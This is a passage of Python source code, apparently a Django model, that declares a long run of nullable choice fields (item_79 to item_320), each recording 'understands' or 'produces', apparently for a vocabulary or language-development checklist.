item_79 = models.CharField(max_length=11, choices=item_79_choices, null=True)
item_80_choices = [('understands', 'understands'), ('produces', 'produces')]
item_80 = models.CharField(max_length=11, choices=item_80_choices, null=True)
item_81_choices = [('understands', 'understands'), ('produces', 'produces')]
item_81 = models.CharField(max_length=11, choices=item_81_choices, null=True)
item_82_choices = [('understands', 'understands'), ('produces', 'produces')]
item_82 = models.CharField(max_length=11, choices=item_82_choices, null=True)
item_83_choices = [('understands', 'understands'), ('produces', 'produces')]
item_83 = models.CharField(max_length=11, choices=item_83_choices, null=True)
item_84_choices = [('understands', 'understands'), ('produces', 'produces')]
item_84 = models.CharField(max_length=11, choices=item_84_choices, null=True)
item_85_choices = [('understands', 'understands'), ('produces', 'produces')]
item_85 = models.CharField(max_length=11, choices=item_85_choices, null=True)
item_86_choices = [('understands', 'understands'), ('produces', 'produces')]
item_86 = models.CharField(max_length=11, choices=item_86_choices, null=True)
item_87_choices = [('understands', 'understands'), ('produces', 'produces')]
item_87 = models.CharField(max_length=11, choices=item_87_choices, null=True)
item_88_choices = [('understands', 'understands'), ('produces', 'produces')]
item_88 = models.CharField(max_length=11, choices=item_88_choices, null=True)
item_89_choices = [('understands', 'understands'), ('produces', 'produces')]
item_89 = models.CharField(max_length=11, choices=item_89_choices, null=True)
item_90_choices = [('understands', 'understands'), ('produces', 'produces')]
item_90 = models.CharField(max_length=11, choices=item_90_choices, null=True)
item_91_choices = [('understands', 'understands'), ('produces', 'produces')]
item_91 = models.CharField(max_length=11, choices=item_91_choices, null=True)
item_92_choices = [('understands', 'understands'), ('produces', 'produces')]
item_92 = models.CharField(max_length=11, choices=item_92_choices, null=True)
item_93_choices = [('understands', 'understands'), ('produces', 'produces')]
item_93 = models.CharField(max_length=11, choices=item_93_choices, null=True)
item_94_choices = [('understands', 'understands'), ('produces', 'produces')]
item_94 = models.CharField(max_length=11, choices=item_94_choices, null=True)
item_95_choices = [('understands', 'understands'), ('produces', 'produces')]
item_95 = models.CharField(max_length=11, choices=item_95_choices, null=True)
item_96_choices = [('understands', 'understands'), ('produces', 'produces')]
item_96 = models.CharField(max_length=11, choices=item_96_choices, null=True)
item_97_choices = [('understands', 'understands'), ('produces', 'produces')]
item_97 = models.CharField(max_length=11, choices=item_97_choices, null=True)
item_98_choices = [('understands', 'understands'), ('produces', 'produces')]
item_98 = models.CharField(max_length=11, choices=item_98_choices, null=True)
item_99_choices = [('understands', 'understands'), ('produces', 'produces')]
item_99 = models.CharField(max_length=11, choices=item_99_choices, null=True)
item_100_choices = [('understands', 'understands'), ('produces', 'produces')]
item_100 = models.CharField(max_length=11, choices=item_100_choices, null=True)
item_101_choices = [('understands', 'understands'), ('produces', 'produces')]
item_101 = models.CharField(max_length=11, choices=item_101_choices, null=True)
item_102_choices = [('understands', 'understands'), ('produces', 'produces')]
item_102 = models.CharField(max_length=11, choices=item_102_choices, null=True)
item_103_choices = [('understands', 'understands'), ('produces', 'produces')]
item_103 = models.CharField(max_length=11, choices=item_103_choices, null=True)
item_104_choices = [('understands', 'understands'), ('produces', 'produces')]
item_104 = models.CharField(max_length=11, choices=item_104_choices, null=True)
item_105_choices = [('understands', 'understands'), ('produces', 'produces')]
item_105 = models.CharField(max_length=11, choices=item_105_choices, null=True)
item_106_choices = [('understands', 'understands'), ('produces', 'produces')]
item_106 = models.CharField(max_length=11, choices=item_106_choices, null=True)
item_107_choices = [('understands', 'understands'), ('produces', 'produces')]
item_107 = models.CharField(max_length=11, choices=item_107_choices, null=True)
item_108_choices = [('understands', 'understands'), ('produces', 'produces')]
item_108 = models.CharField(max_length=11, choices=item_108_choices, null=True)
item_109_choices = [('understands', 'understands'), ('produces', 'produces')]
item_109 = models.CharField(max_length=11, choices=item_109_choices, null=True)
item_110_choices = [('understands', 'understands'), ('produces', 'produces')]
item_110 = models.CharField(max_length=11, choices=item_110_choices, null=True)
item_111_choices = [('understands', 'understands'), ('produces', 'produces')]
item_111 = models.CharField(max_length=11, choices=item_111_choices, null=True)
item_112_choices = [('understands', 'understands'), ('produces', 'produces')]
item_112 = models.CharField(max_length=11, choices=item_112_choices, null=True)
item_113_choices = [('understands', 'understands'), ('produces', 'produces')]
item_113 = models.CharField(max_length=11, choices=item_113_choices, null=True)
item_114_choices = [('understands', 'understands'), ('produces', 'produces')]
item_114 = models.CharField(max_length=11, choices=item_114_choices, null=True)
item_115_choices = [('understands', 'understands'), ('produces', 'produces')]
item_115 = models.CharField(max_length=11, choices=item_115_choices, null=True)
item_116_choices = [('understands', 'understands'), ('produces', 'produces')]
item_116 = models.CharField(max_length=11, choices=item_116_choices, null=True)
item_117_choices = [('understands', 'understands'), ('produces', 'produces')]
item_117 = models.CharField(max_length=11, choices=item_117_choices, null=True)
item_118_choices = [('understands', 'understands'), ('produces', 'produces')]
item_118 = models.CharField(max_length=11, choices=item_118_choices, null=True)
item_119_choices = [('understands', 'understands'), ('produces', 'produces')]
item_119 = models.CharField(max_length=11, choices=item_119_choices, null=True)
item_120_choices = [('understands', 'understands'), ('produces', 'produces')]
item_120 = models.CharField(max_length=11, choices=item_120_choices, null=True)
item_121_choices = [('understands', 'understands'), ('produces', 'produces')]
item_121 = models.CharField(max_length=11, choices=item_121_choices, null=True)
item_122_choices = [('understands', 'understands'), ('produces', 'produces')]
item_122 = models.CharField(max_length=11, choices=item_122_choices, null=True)
item_123_choices = [('understands', 'understands'), ('produces', 'produces')]
item_123 = models.CharField(max_length=11, choices=item_123_choices, null=True)
item_124_choices = [('understands', 'understands'), ('produces', 'produces')]
item_124 = models.CharField(max_length=11, choices=item_124_choices, null=True)
item_125_choices = [('understands', 'understands'), ('produces', 'produces')]
item_125 = models.CharField(max_length=11, choices=item_125_choices, null=True)
item_126_choices = [('understands', 'understands'), ('produces', 'produces')]
item_126 = models.CharField(max_length=11, choices=item_126_choices, null=True)
item_127_choices = [('understands', 'understands'), ('produces', 'produces')]
item_127 = models.CharField(max_length=11, choices=item_127_choices, null=True)
item_128_choices = [('understands', 'understands'), ('produces', 'produces')]
item_128 = models.CharField(max_length=11, choices=item_128_choices, null=True)
item_129_choices = [('understands', 'understands'), ('produces', 'produces')]
item_129 = models.CharField(max_length=11, choices=item_129_choices, null=True)
item_130_choices = [('understands', 'understands'), ('produces', 'produces')]
item_130 = models.CharField(max_length=11, choices=item_130_choices, null=True)
item_131_choices = [('understands', 'understands'), ('produces', 'produces')]
item_131 = models.CharField(max_length=11, choices=item_131_choices, null=True)
item_132_choices = [('understands', 'understands'), ('produces', 'produces')]
item_132 = models.CharField(max_length=11, choices=item_132_choices, null=True)
item_133_choices = [('understands', 'understands'), ('produces', 'produces')]
item_133 = models.CharField(max_length=11, choices=item_133_choices, null=True)
item_134_choices = [('understands', 'understands'), ('produces', 'produces')]
item_134 = models.CharField(max_length=11, choices=item_134_choices, null=True)
item_135_choices = [('understands', 'understands'), ('produces', 'produces')]
item_135 = models.CharField(max_length=11, choices=item_135_choices, null=True)
item_136_choices = [('understands', 'understands'), ('produces', 'produces')]
item_136 = models.CharField(max_length=11, choices=item_136_choices, null=True)
item_137_choices = [('understands', 'understands'), ('produces', 'produces')]
item_137 = models.CharField(max_length=11, choices=item_137_choices, null=True)
item_138_choices = [('understands', 'understands'), ('produces', 'produces')]
item_138 = models.CharField(max_length=11, choices=item_138_choices, null=True)
item_139_choices = [('understands', 'understands'), ('produces', 'produces')]
item_139 = models.CharField(max_length=11, choices=item_139_choices, null=True)
item_140_choices = [('understands', 'understands'), ('produces', 'produces')]
item_140 = models.CharField(max_length=11, choices=item_140_choices, null=True)
item_141_choices = [('understands', 'understands'), ('produces', 'produces')]
item_141 = models.CharField(max_length=11, choices=item_141_choices, null=True)
item_142_choices = [('understands', 'understands'), ('produces', 'produces')]
item_142 = models.CharField(max_length=11, choices=item_142_choices, null=True)
item_143_choices = [('understands', 'understands'), ('produces', 'produces')]
item_143 = models.CharField(max_length=11, choices=item_143_choices, null=True)
item_144_choices = [('understands', 'understands'), ('produces', 'produces')]
item_144 = models.CharField(max_length=11, choices=item_144_choices, null=True)
item_145_choices = [('understands', 'understands'), ('produces', 'produces')]
item_145 = models.CharField(max_length=11, choices=item_145_choices, null=True)
item_146_choices = [('understands', 'understands'), ('produces', 'produces')]
item_146 = models.CharField(max_length=11, choices=item_146_choices, null=True)
item_147_choices = [('understands', 'understands'), ('produces', 'produces')]
item_147 = models.CharField(max_length=11, choices=item_147_choices, null=True)
item_148_choices = [('understands', 'understands'), ('produces', 'produces')]
item_148 = models.CharField(max_length=11, choices=item_148_choices, null=True)
item_149_choices = [('understands', 'understands'), ('produces', 'produces')]
item_149 = models.CharField(max_length=11, choices=item_149_choices, null=True)
item_150_choices = [('understands', 'understands'), ('produces', 'produces')]
item_150 = models.CharField(max_length=11, choices=item_150_choices, null=True)
item_151_choices = [('understands', 'understands'), ('produces', 'produces')]
item_151 = models.CharField(max_length=11, choices=item_151_choices, null=True)
item_152_choices = [('understands', 'understands'), ('produces', 'produces')]
item_152 = models.CharField(max_length=11, choices=item_152_choices, null=True)
item_153_choices = [('understands', 'understands'), ('produces', 'produces')]
item_153 = models.CharField(max_length=11, choices=item_153_choices, null=True)
item_154_choices = [('understands', 'understands'), ('produces', 'produces')]
item_154 = models.CharField(max_length=11, choices=item_154_choices, null=True)
item_155_choices = [('understands', 'understands'), ('produces', 'produces')]
item_155 = models.CharField(max_length=11, choices=item_155_choices, null=True)
item_156_choices = [('understands', 'understands'), ('produces', 'produces')]
item_156 = models.CharField(max_length=11, choices=item_156_choices, null=True)
item_157_choices = [('understands', 'understands'), ('produces', 'produces')]
item_157 = models.CharField(max_length=11, choices=item_157_choices, null=True)
item_158_choices = [('understands', 'understands'), ('produces', 'produces')]
item_158 = models.CharField(max_length=11, choices=item_158_choices, null=True)
item_159_choices = [('understands', 'understands'), ('produces', 'produces')]
item_159 = models.CharField(max_length=11, choices=item_159_choices, null=True)
item_160_choices = [('understands', 'understands'), ('produces', 'produces')]
item_160 = models.CharField(max_length=11, choices=item_160_choices, null=True)
item_161_choices = [('understands', 'understands'), ('produces', 'produces')]
item_161 = models.CharField(max_length=11, choices=item_161_choices, null=True)
item_162_choices = [('understands', 'understands'), ('produces', 'produces')]
item_162 = models.CharField(max_length=11, choices=item_162_choices, null=True)
item_163_choices = [('understands', 'understands'), ('produces', 'produces')]
item_163 = models.CharField(max_length=11, choices=item_163_choices, null=True)
item_164_choices = [('understands', 'understands'), ('produces', 'produces')]
item_164 = models.CharField(max_length=11, choices=item_164_choices, null=True)
item_165_choices = [('understands', 'understands'), ('produces', 'produces')]
item_165 = models.CharField(max_length=11, choices=item_165_choices, null=True)
item_166_choices = [('understands', 'understands'), ('produces', 'produces')]
item_166 = models.CharField(max_length=11, choices=item_166_choices, null=True)
item_167_choices = [('understands', 'understands'), ('produces', 'produces')]
item_167 = models.CharField(max_length=11, choices=item_167_choices, null=True)
item_168_choices = [('understands', 'understands'), ('produces', 'produces')]
item_168 = models.CharField(max_length=11, choices=item_168_choices, null=True)
item_169_choices = [('understands', 'understands'), ('produces', 'produces')]
item_169 = models.CharField(max_length=11, choices=item_169_choices, null=True)
item_170_choices = [('understands', 'understands'), ('produces', 'produces')]
item_170 = models.CharField(max_length=11, choices=item_170_choices, null=True)
item_171_choices = [('understands', 'understands'), ('produces', 'produces')]
item_171 = models.CharField(max_length=11, choices=item_171_choices, null=True)
item_172_choices = [('understands', 'understands'), ('produces', 'produces')]
item_172 = models.CharField(max_length=11, choices=item_172_choices, null=True)
item_173_choices = [('understands', 'understands'), ('produces', 'produces')]
item_173 = models.CharField(max_length=11, choices=item_173_choices, null=True)
item_174_choices = [('understands', 'understands'), ('produces', 'produces')]
item_174 = models.CharField(max_length=11, choices=item_174_choices, null=True)
item_175_choices = [('understands', 'understands'), ('produces', 'produces')]
item_175 = models.CharField(max_length=11, choices=item_175_choices, null=True)
item_176_choices = [('understands', 'understands'), ('produces', 'produces')]
item_176 = models.CharField(max_length=11, choices=item_176_choices, null=True)
item_177_choices = [('understands', 'understands'), ('produces', 'produces')]
item_177 = models.CharField(max_length=11, choices=item_177_choices, null=True)
item_178_choices = [('understands', 'understands'), ('produces', 'produces')]
item_178 = models.CharField(max_length=11, choices=item_178_choices, null=True)
item_179_choices = [('understands', 'understands'), ('produces', 'produces')]
item_179 = models.CharField(max_length=11, choices=item_179_choices, null=True)
item_180_choices = [('understands', 'understands'), ('produces', 'produces')]
item_180 = models.CharField(max_length=11, choices=item_180_choices, null=True)
item_181_choices = [('understands', 'understands'), ('produces', 'produces')]
item_181 = models.CharField(max_length=11, choices=item_181_choices, null=True)
item_182_choices = [('understands', 'understands'), ('produces', 'produces')]
item_182 = models.CharField(max_length=11, choices=item_182_choices, null=True)
item_183_choices = [('understands', 'understands'), ('produces', 'produces')]
item_183 = models.CharField(max_length=11, choices=item_183_choices, null=True)
item_184_choices = [('understands', 'understands'), ('produces', 'produces')]
item_184 = models.CharField(max_length=11, choices=item_184_choices, null=True)
item_185_choices = [('understands', 'understands'), ('produces', 'produces')]
item_185 = models.CharField(max_length=11, choices=item_185_choices, null=True)
item_186_choices = [('understands', 'understands'), ('produces', 'produces')]
item_186 = models.CharField(max_length=11, choices=item_186_choices, null=True)
item_187_choices = [('understands', 'understands'), ('produces', 'produces')]
item_187 = models.CharField(max_length=11, choices=item_187_choices, null=True)
item_188_choices = [('understands', 'understands'), ('produces', 'produces')]
item_188 = models.CharField(max_length=11, choices=item_188_choices, null=True)
item_189_choices = [('understands', 'understands'), ('produces', 'produces')]
item_189 = models.CharField(max_length=11, choices=item_189_choices, null=True)
item_190_choices = [('understands', 'understands'), ('produces', 'produces')]
item_190 = models.CharField(max_length=11, choices=item_190_choices, null=True)
item_191_choices = [('understands', 'understands'), ('produces', 'produces')]
item_191 = models.CharField(max_length=11, choices=item_191_choices, null=True)
item_192_choices = [('understands', 'understands'), ('produces', 'produces')]
item_192 = models.CharField(max_length=11, choices=item_192_choices, null=True)
item_193_choices = [('understands', 'understands'), ('produces', 'produces')]
item_193 = models.CharField(max_length=11, choices=item_193_choices, null=True)
item_194_choices = [('understands', 'understands'), ('produces', 'produces')]
item_194 = models.CharField(max_length=11, choices=item_194_choices, null=True)
item_195_choices = [('understands', 'understands'), ('produces', 'produces')]
item_195 = models.CharField(max_length=11, choices=item_195_choices, null=True)
item_196_choices = [('understands', 'understands'), ('produces', 'produces')]
item_196 = models.CharField(max_length=11, choices=item_196_choices, null=True)
item_197_choices = [('understands', 'understands'), ('produces', 'produces')]
item_197 = models.CharField(max_length=11, choices=item_197_choices, null=True)
item_198_choices = [('understands', 'understands'), ('produces', 'produces')]
item_198 = models.CharField(max_length=11, choices=item_198_choices, null=True)
item_199_choices = [('understands', 'understands'), ('produces', 'produces')]
item_199 = models.CharField(max_length=11, choices=item_199_choices, null=True)
item_200_choices = [('understands', 'understands'), ('produces', 'produces')]
item_200 = models.CharField(max_length=11, choices=item_200_choices, null=True)
item_201_choices = [('understands', 'understands'), ('produces', 'produces')]
item_201 = models.CharField(max_length=11, choices=item_201_choices, null=True)
item_202_choices = [('understands', 'understands'), ('produces', 'produces')]
item_202 = models.CharField(max_length=11, choices=item_202_choices, null=True)
item_203_choices = [('understands', 'understands'), ('produces', 'produces')]
item_203 = models.CharField(max_length=11, choices=item_203_choices, null=True)
item_204_choices = [('understands', 'understands'), ('produces', 'produces')]
item_204 = models.CharField(max_length=11, choices=item_204_choices, null=True)
item_205_choices = [('understands', 'understands'), ('produces', 'produces')]
item_205 = models.CharField(max_length=11, choices=item_205_choices, null=True)
item_206_choices = [('understands', 'understands'), ('produces', 'produces')]
item_206 = models.CharField(max_length=11, choices=item_206_choices, null=True)
item_207_choices = [('understands', 'understands'), ('produces', 'produces')]
item_207 = models.CharField(max_length=11, choices=item_207_choices, null=True)
item_208_choices = [('understands', 'understands'), ('produces', 'produces')]
item_208 = models.CharField(max_length=11, choices=item_208_choices, null=True)
item_209_choices = [('understands', 'understands'), ('produces', 'produces')]
item_209 = models.CharField(max_length=11, choices=item_209_choices, null=True)
item_210_choices = [('understands', 'understands'), ('produces', 'produces')]
item_210 = models.CharField(max_length=11, choices=item_210_choices, null=True)
item_211_choices = [('understands', 'understands'), ('produces', 'produces')]
item_211 = models.CharField(max_length=11, choices=item_211_choices, null=True)
item_212_choices = [('understands', 'understands'), ('produces', 'produces')]
item_212 = models.CharField(max_length=11, choices=item_212_choices, null=True)
item_213_choices = [('understands', 'understands'), ('produces', 'produces')]
item_213 = models.CharField(max_length=11, choices=item_213_choices, null=True)
item_214_choices = [('understands', 'understands'), ('produces', 'produces')]
item_214 = models.CharField(max_length=11, choices=item_214_choices, null=True)
item_215_choices = [('understands', 'understands'), ('produces', 'produces')]
item_215 = models.CharField(max_length=11, choices=item_215_choices, null=True)
item_216_choices = [('understands', 'understands'), ('produces', 'produces')]
item_216 = models.CharField(max_length=11, choices=item_216_choices, null=True)
item_217_choices = [('understands', 'understands'), ('produces', 'produces')]
item_217 = models.CharField(max_length=11, choices=item_217_choices, null=True)
item_218_choices = [('understands', 'understands'), ('produces', 'produces')]
item_218 = models.CharField(max_length=11, choices=item_218_choices, null=True)
item_219_choices = [('understands', 'understands'), ('produces', 'produces')]
item_219 = models.CharField(max_length=11, choices=item_219_choices, null=True)
item_220_choices = [('understands', 'understands'), ('produces', 'produces')]
item_220 = models.CharField(max_length=11, choices=item_220_choices, null=True)
item_221_choices = [('understands', 'understands'), ('produces', 'produces')]
item_221 = models.CharField(max_length=11, choices=item_221_choices, null=True)
item_222_choices = [('understands', 'understands'), ('produces', 'produces')]
item_222 = models.CharField(max_length=11, choices=item_222_choices, null=True)
item_223_choices = [('understands', 'understands'), ('produces', 'produces')]
item_223 = models.CharField(max_length=11, choices=item_223_choices, null=True)
item_224_choices = [('understands', 'understands'), ('produces', 'produces')]
item_224 = models.CharField(max_length=11, choices=item_224_choices, null=True)
item_225_choices = [('understands', 'understands'), ('produces', 'produces')]
item_225 = models.CharField(max_length=11, choices=item_225_choices, null=True)
item_226_choices = [('understands', 'understands'), ('produces', 'produces')]
item_226 = models.CharField(max_length=11, choices=item_226_choices, null=True)
item_227_choices = [('understands', 'understands'), ('produces', 'produces')]
item_227 = models.CharField(max_length=11, choices=item_227_choices, null=True)
item_228_choices = [('understands', 'understands'), ('produces', 'produces')]
item_228 = models.CharField(max_length=11, choices=item_228_choices, null=True)
item_229_choices = [('understands', 'understands'), ('produces', 'produces')]
item_229 = models.CharField(max_length=11, choices=item_229_choices, null=True)
item_230_choices = [('understands', 'understands'), ('produces', 'produces')]
item_230 = models.CharField(max_length=11, choices=item_230_choices, null=True)
item_231_choices = [('understands', 'understands'), ('produces', 'produces')]
item_231 = models.CharField(max_length=11, choices=item_231_choices, null=True)
item_232_choices = [('understands', 'understands'), ('produces', 'produces')]
item_232 = models.CharField(max_length=11, choices=item_232_choices, null=True)
item_233_choices = [('understands', 'understands'), ('produces', 'produces')]
item_233 = models.CharField(max_length=11, choices=item_233_choices, null=True)
item_234_choices = [('understands', 'understands'), ('produces', 'produces')]
item_234 = models.CharField(max_length=11, choices=item_234_choices, null=True)
item_235_choices = [('understands', 'understands'), ('produces', 'produces')]
item_235 = models.CharField(max_length=11, choices=item_235_choices, null=True)
item_236_choices = [('understands', 'understands'), ('produces', 'produces')]
item_236 = models.CharField(max_length=11, choices=item_236_choices, null=True)
item_237_choices = [('understands', 'understands'), ('produces', 'produces')]
item_237 = models.CharField(max_length=11, choices=item_237_choices, null=True)
item_238_choices = [('understands', 'understands'), ('produces', 'produces')]
item_238 = models.CharField(max_length=11, choices=item_238_choices, null=True)
item_239_choices = [('understands', 'understands'), ('produces', 'produces')]
item_239 = models.CharField(max_length=11, choices=item_239_choices, null=True)
item_240_choices = [('understands', 'understands'), ('produces', 'produces')]
item_240 = models.CharField(max_length=11, choices=item_240_choices, null=True)
item_241_choices = [('understands', 'understands'), ('produces', 'produces')]
item_241 = models.CharField(max_length=11, choices=item_241_choices, null=True)
item_242_choices = [('understands', 'understands'), ('produces', 'produces')]
item_242 = models.CharField(max_length=11, choices=item_242_choices, null=True)
item_243_choices = [('understands', 'understands'), ('produces', 'produces')]
item_243 = models.CharField(max_length=11, choices=item_243_choices, null=True)
item_244_choices = [('understands', 'understands'), ('produces', 'produces')]
item_244 = models.CharField(max_length=11, choices=item_244_choices, null=True)
item_245_choices = [('understands', 'understands'), ('produces', 'produces')]
item_245 = models.CharField(max_length=11, choices=item_245_choices, null=True)
item_246_choices = [('understands', 'understands'), ('produces', 'produces')]
item_246 = models.CharField(max_length=11, choices=item_246_choices, null=True)
item_247_choices = [('understands', 'understands'), ('produces', 'produces')]
item_247 = models.CharField(max_length=11, choices=item_247_choices, null=True)
item_248_choices = [('understands', 'understands'), ('produces', 'produces')]
item_248 = models.CharField(max_length=11, choices=item_248_choices, null=True)
item_249_choices = [('understands', 'understands'), ('produces', 'produces')]
item_249 = models.CharField(max_length=11, choices=item_249_choices, null=True)
item_250_choices = [('understands', 'understands'), ('produces', 'produces')]
item_250 = models.CharField(max_length=11, choices=item_250_choices, null=True)
item_251_choices = [('understands', 'understands'), ('produces', 'produces')]
item_251 = models.CharField(max_length=11, choices=item_251_choices, null=True)
item_252_choices = [('understands', 'understands'), ('produces', 'produces')]
item_252 = models.CharField(max_length=11, choices=item_252_choices, null=True)
item_253_choices = [('understands', 'understands'), ('produces', 'produces')]
item_253 = models.CharField(max_length=11, choices=item_253_choices, null=True)
item_254_choices = [('understands', 'understands'), ('produces', 'produces')]
item_254 = models.CharField(max_length=11, choices=item_254_choices, null=True)
item_255_choices = [('understands', 'understands'), ('produces', 'produces')]
item_255 = models.CharField(max_length=11, choices=item_255_choices, null=True)
item_256_choices = [('understands', 'understands'), ('produces', 'produces')]
item_256 = models.CharField(max_length=11, choices=item_256_choices, null=True)
item_257_choices = [('understands', 'understands'), ('produces', 'produces')]
item_257 = models.CharField(max_length=11, choices=item_257_choices, null=True)
item_258_choices = [('understands', 'understands'), ('produces', 'produces')]
item_258 = models.CharField(max_length=11, choices=item_258_choices, null=True)
item_259_choices = [('understands', 'understands'), ('produces', 'produces')]
item_259 = models.CharField(max_length=11, choices=item_259_choices, null=True)
item_260_choices = [('understands', 'understands'), ('produces', 'produces')]
item_260 = models.CharField(max_length=11, choices=item_260_choices, null=True)
item_261_choices = [('understands', 'understands'), ('produces', 'produces')]
item_261 = models.CharField(max_length=11, choices=item_261_choices, null=True)
item_262_choices = [('understands', 'understands'), ('produces', 'produces')]
item_262 = models.CharField(max_length=11, choices=item_262_choices, null=True)
item_263_choices = [('understands', 'understands'), ('produces', 'produces')]
item_263 = models.CharField(max_length=11, choices=item_263_choices, null=True)
item_264_choices = [('understands', 'understands'), ('produces', 'produces')]
item_264 = models.CharField(max_length=11, choices=item_264_choices, null=True)
item_265_choices = [('understands', 'understands'), ('produces', 'produces')]
item_265 = models.CharField(max_length=11, choices=item_265_choices, null=True)
item_266_choices = [('understands', 'understands'), ('produces', 'produces')]
item_266 = models.CharField(max_length=11, choices=item_266_choices, null=True)
item_267_choices = [('understands', 'understands'), ('produces', 'produces')]
item_267 = models.CharField(max_length=11, choices=item_267_choices, null=True)
item_268_choices = [('understands', 'understands'), ('produces', 'produces')]
item_268 = models.CharField(max_length=11, choices=item_268_choices, null=True)
item_269_choices = [('understands', 'understands'), ('produces', 'produces')]
item_269 = models.CharField(max_length=11, choices=item_269_choices, null=True)
item_270_choices = [('understands', 'understands'), ('produces', 'produces')]
item_270 = models.CharField(max_length=11, choices=item_270_choices, null=True)
item_271_choices = [('understands', 'understands'), ('produces', 'produces')]
item_271 = models.CharField(max_length=11, choices=item_271_choices, null=True)
item_272_choices = [('understands', 'understands'), ('produces', 'produces')]
item_272 = models.CharField(max_length=11, choices=item_272_choices, null=True)
item_273_choices = [('understands', 'understands'), ('produces', 'produces')]
item_273 = models.CharField(max_length=11, choices=item_273_choices, null=True)
item_274_choices = [('understands', 'understands'), ('produces', 'produces')]
item_274 = models.CharField(max_length=11, choices=item_274_choices, null=True)
item_275_choices = [('understands', 'understands'), ('produces', 'produces')]
item_275 = models.CharField(max_length=11, choices=item_275_choices, null=True)
item_276_choices = [('understands', 'understands'), ('produces', 'produces')]
item_276 = models.CharField(max_length=11, choices=item_276_choices, null=True)
item_277_choices = [('understands', 'understands'), ('produces', 'produces')]
item_277 = models.CharField(max_length=11, choices=item_277_choices, null=True)
item_278_choices = [('understands', 'understands'), ('produces', 'produces')]
item_278 = models.CharField(max_length=11, choices=item_278_choices, null=True)
item_279_choices = [('understands', 'understands'), ('produces', 'produces')]
item_279 = models.CharField(max_length=11, choices=item_279_choices, null=True)
item_280_choices = [('understands', 'understands'), ('produces', 'produces')]
item_280 = models.CharField(max_length=11, choices=item_280_choices, null=True)
item_281_choices = [('understands', 'understands'), ('produces', 'produces')]
item_281 = models.CharField(max_length=11, choices=item_281_choices, null=True)
item_282_choices = [('understands', 'understands'), ('produces', 'produces')]
item_282 = models.CharField(max_length=11, choices=item_282_choices, null=True)
item_283_choices = [('understands', 'understands'), ('produces', 'produces')]
item_283 = models.CharField(max_length=11, choices=item_283_choices, null=True)
item_284_choices = [('understands', 'understands'), ('produces', 'produces')]
item_284 = models.CharField(max_length=11, choices=item_284_choices, null=True)
item_285_choices = [('understands', 'understands'), ('produces', 'produces')]
item_285 = models.CharField(max_length=11, choices=item_285_choices, null=True)
item_286_choices = [('understands', 'understands'), ('produces', 'produces')]
item_286 = models.CharField(max_length=11, choices=item_286_choices, null=True)
item_287_choices = [('understands', 'understands'), ('produces', 'produces')]
item_287 = models.CharField(max_length=11, choices=item_287_choices, null=True)
item_288_choices = [('understands', 'understands'), ('produces', 'produces')]
item_288 = models.CharField(max_length=11, choices=item_288_choices, null=True)
item_289_choices = [('understands', 'understands'), ('produces', 'produces')]
item_289 = models.CharField(max_length=11, choices=item_289_choices, null=True)
item_290_choices = [('understands', 'understands'), ('produces', 'produces')]
item_290 = models.CharField(max_length=11, choices=item_290_choices, null=True)
item_291_choices = [('understands', 'understands'), ('produces', 'produces')]
item_291 = models.CharField(max_length=11, choices=item_291_choices, null=True)
item_292_choices = [('understands', 'understands'), ('produces', 'produces')]
item_292 = models.CharField(max_length=11, choices=item_292_choices, null=True)
item_293_choices = [('understands', 'understands'), ('produces', 'produces')]
item_293 = models.CharField(max_length=11, choices=item_293_choices, null=True)
item_294_choices = [('understands', 'understands'), ('produces', 'produces')]
item_294 = models.CharField(max_length=11, choices=item_294_choices, null=True)
item_295_choices = [('understands', 'understands'), ('produces', 'produces')]
item_295 = models.CharField(max_length=11, choices=item_295_choices, null=True)
item_296_choices = [('understands', 'understands'), ('produces', 'produces')]
item_296 = models.CharField(max_length=11, choices=item_296_choices, null=True)
item_297_choices = [('understands', 'understands'), ('produces', 'produces')]
item_297 = models.CharField(max_length=11, choices=item_297_choices, null=True)
item_298_choices = [('understands', 'understands'), ('produces', 'produces')]
item_298 = models.CharField(max_length=11, choices=item_298_choices, null=True)
item_299_choices = [('understands', 'understands'), ('produces', 'produces')]
item_299 = models.CharField(max_length=11, choices=item_299_choices, null=True)
item_300_choices = [('understands', 'understands'), ('produces', 'produces')]
item_300 = models.CharField(max_length=11, choices=item_300_choices, null=True)
item_301_choices = [('understands', 'understands'), ('produces', 'produces')]
item_301 = models.CharField(max_length=11, choices=item_301_choices, null=True)
item_302_choices = [('understands', 'understands'), ('produces', 'produces')]
item_302 = models.CharField(max_length=11, choices=item_302_choices, null=True)
item_303_choices = [('understands', 'understands'), ('produces', 'produces')]
item_303 = models.CharField(max_length=11, choices=item_303_choices, null=True)
item_304_choices = [('understands', 'understands'), ('produces', 'produces')]
item_304 = models.CharField(max_length=11, choices=item_304_choices, null=True)
item_305_choices = [('understands', 'understands'), ('produces', 'produces')]
item_305 = models.CharField(max_length=11, choices=item_305_choices, null=True)
item_306_choices = [('understands', 'understands'), ('produces', 'produces')]
item_306 = models.CharField(max_length=11, choices=item_306_choices, null=True)
item_307_choices = [('understands', 'understands'), ('produces', 'produces')]
item_307 = models.CharField(max_length=11, choices=item_307_choices, null=True)
item_308_choices = [('understands', 'understands'), ('produces', 'produces')]
item_308 = models.CharField(max_length=11, choices=item_308_choices, null=True)
item_309_choices = [('understands', 'understands'), ('produces', 'produces')]
item_309 = models.CharField(max_length=11, choices=item_309_choices, null=True)
item_310_choices = [('understands', 'understands'), ('produces', 'produces')]
item_310 = models.CharField(max_length=11, choices=item_310_choices, null=True)
item_311_choices = [('understands', 'understands'), ('produces', 'produces')]
item_311 = models.CharField(max_length=11, choices=item_311_choices, null=True)
item_312_choices = [('understands', 'understands'), ('produces', 'produces')]
item_312 = models.CharField(max_length=11, choices=item_312_choices, null=True)
item_313_choices = [('understands', 'understands'), ('produces', 'produces')]
item_313 = models.CharField(max_length=11, choices=item_313_choices, null=True)
item_314_choices = [('understands', 'understands'), ('produces', 'produces')]
item_314 = models.CharField(max_length=11, choices=item_314_choices, null=True)
item_315_choices = [('understands', 'understands'), ('produces', 'produces')]
item_315 = models.CharField(max_length=11, choices=item_315_choices, null=True)
item_316_choices = [('understands', 'understands'), ('produces', 'produces')]
item_316 = models.CharField(max_length=11, choices=item_316_choices, null=True)
item_317_choices = [('understands', 'understands'), ('produces', 'produces')]
item_317 = models.CharField(max_length=11, choices=item_317_choices, null=True)
item_318_choices = [('understands', 'understands'), ('produces', 'produces')]
item_318 = models.CharField(max_length=11, choices=item_318_choices, null=True)
item_319_choices = [('understands', 'understands'), ('produces', 'produces')]
item_319 = models.CharField(max_length=11, choices=item_319_choices, null=True)
item_320_choices = [('understands', 'understands'), ('produces', 'produces')]
item_320 = models.CharField(max_length=11, choices=item_320_choices, null=True)
